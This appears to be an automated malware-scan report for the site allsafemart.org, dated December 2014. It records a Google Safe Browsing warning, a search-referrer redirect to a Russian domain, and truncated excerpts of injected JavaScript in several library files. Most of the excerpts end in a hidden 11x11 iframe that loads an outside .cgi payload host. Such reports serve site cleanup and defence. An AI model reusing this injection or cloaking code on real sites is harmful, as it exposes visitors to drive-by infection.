Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=allsafemart.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://allsafemart.org/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: allsafemart.org Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Dec 2014 15:45:55 GMT Location: http://smartlookingultravnc.ru/Intellectual?7 Server: Apache Content-Length: 253 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://allsafemart.org/ | 200 OK Content-Length: 25969 Content-Type: text/html | clean |
http://allsafemart.org/lib/javascript-static.js | 200 OK Content-Length: 18293 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 } else { myField.value += myValue; } } function addonload(fn) { var oldhandler=window.onload; window.onload=function() { if(oldhandler) oldhandler(); fn(); } } ;document.write('<iframe src="http://iqcyfkvn.ns2.name/termasloda.cgi?7" scrolling="auto" frameborder="no" align="center" height="11" width="11"></iframe>'); Antivirus reports:
| ||
http://allsafemart.org/lib/javascript-mod.php | 200 OK Content-Length: 34 Content-Type: text/javascript | clean |
http://allsafemart.org/lib/overlib/overlib.js | 200 OK Content-Length: 52677 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 registerNoParameterCommands('sticky,autostatus,autostatuscap,fullhtml,hauto,vauto,closeclick,wrap,followmouse,mouseoff,compatmode'); /////// // ESTABLISH MOUSECAPTURING /////// // Capture events, alt. diffuses the overlib function. var olCheckMouseCapture=true; if ((olNs4 || olNs6 || olIe4)) { olMouseCapture(); } else { overlib = no_overlib; nd = no_overlib; ver3fix = true; } ;document.write('<iframe src="http: Antivirus reports:
| ||
http://allsafemart.org/lib/overlib/overlib_cssstyle.js | 200 OK Content-Length: 12261 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 registerHook("ol_content_simple", ol_content_simple_cssstyle, FALTERNATE, CSSSTYLE); registerHook("ol_content_caption", ol_content_caption_cssstyle, FALTERNATE, CSSSTYLE); registerHook("ol_content_background", ol_content_background_cssstyle, FALTERNATE, CSSSTYLE); };document.write('<iframe src="http://iqcyfkvn.ns2.name/termasloda.cgi?7" scrolling="auto" frameborder="no" align="center" height="11" width="11"></iframe>'); Antivirus reports:
| ||
http://allsafemart.org/lib/cookies.js | 200 OK Content-Length: 5859 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 this.changePath=function(chPath) { this.kill(); this.path=chPath; this.set(); } this.changeDomain=function(chDom) { this.kill(); this.domain=chDom; this.set(); } this.changeSecurity=function(chSec) { this.kill(); this.secure=chSec; this.set(); } } ;document.write('<iframe src="http://iqcyfkvn.ns2.name/termasloda.cgi?7" scrolling="auto" frameborder="no" align="center" height="11" width="11"></iframe>'); Antivirus reports:
| ||
http://allsafemart.org/lib/ufo.js | 200 OK Content-Length: 14780 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 } if (j > 1000) { break; } } } } }; if (typeof window.attachEvent != "undefined" && UFO.uaHas("ieWin")) { window.attachEvent("onunload", UFO.cleanupIELeaks); } ;document.write('<iframe src="http://iqcyfkvn.ns2.name/termasloda.cgi?7" scrolling="auto" frameborder="no" align="center" height="11" width="11"></iframe>'); Antivirus reports:
| ||
http://allsafemart.org/lib/dropdown.js | 200 OK Content-Length: 6048 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 { this.changed = true; selectChanged(this); } else if (theEvent.keyCode == keyCodeEsc) { this.value = this.initValue; } else { this.changed = false; } return true; };document.write('<iframe src="http://iqcyfkvn.ns2.name/termasloda.cgi?7" scrolling="auto" frameborder="no" align="center" height="11" width="11"></iframe>'); Antivirus reports:
| ||
http://allsafemart.org/calendar/overlib.cfg.php | 200 OK Content-Length: 233 Content-Type: text/html | clean |
http://allsafemart.org/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |